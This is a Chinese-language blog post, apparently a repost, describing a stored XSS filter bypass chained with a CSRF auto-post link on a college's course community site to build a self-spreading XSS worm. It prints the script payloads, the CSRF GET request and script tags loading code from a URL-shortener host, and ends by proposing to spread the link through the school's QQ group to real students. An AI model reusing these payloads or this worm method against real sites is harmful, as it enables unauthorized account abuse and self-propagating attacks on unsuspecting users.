1. 程式人生 > 其它 >【實戰】儲存XSS+CSRF(XSS繞過到蠕蟲攻擊)

【實戰】儲存XSS+CSRF(XSS繞過到蠕蟲攻擊)

0x00 儲存XSS

1) 可繞過的XSS

給大家分享個漏洞案例,今天上午剛把電腦修好
某技術學院儲存XSS+CSRF(XSS繞過濾到蠕蟲攻擊)
註冊處:

http://xxx.edu.cn/meol/xxxx

需要註冊才能進入社群發表,先說下儲存XSS,過濾了,發現可繞過
儲存XSS:

http://xxx.edu.cn/meol/xxx?genre=80&type=0

他是先過濾再輸出,而不是輸出時過濾,從而導致可繞過 

我們發現他輸入時就進行了過濾,直接替換

<script>alert('XSS')</script>

成功彈框:

 

0x01 CSRF配合XSS蠕蟲

同樣是這個位置,發表話題,改成get請求 

得到連線:
CSRF:

http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE

點選連結會自動發表內容
我們縮短一下連結 網上有線上縮短的,縮短後連結http://suo.im/abc
構造一下csrf連線:

<script src=http://suo.im/abc></script>

(插入到網頁當中,當別人訪問你的個人中心,會自動發表一個內容)
接著我們繼續構造,找到CSRF漏洞處,把後面的內容替換為CSRF連結,也就是訪問此連線會自動發表內容

http://xxx.edu.cn/meol/xxx?type=0&studyCircleId=&saytext=<script src=http://suo.im/xxx></script>

 

繼續縮短網址:
縮短後:http://suo.im/XXXX這個時候我們再呼叫一下CSRF+XSS的地址:

<script src=http://suo.im/XXXX></script>

把這個連結插入到網頁當中即可完成XSS蠕蟲攻擊
當A訪問你的主頁時,A會發表和你一樣的內容,當B訪問A的主頁時,B會發表和A一樣的內容,同理,完成XSS蠕蟲攻擊

最後的思路就是自己構造個網站,加這個學校的QQ群,傳送連結哈哈。

  對網安感興趣的關注下公眾號吧~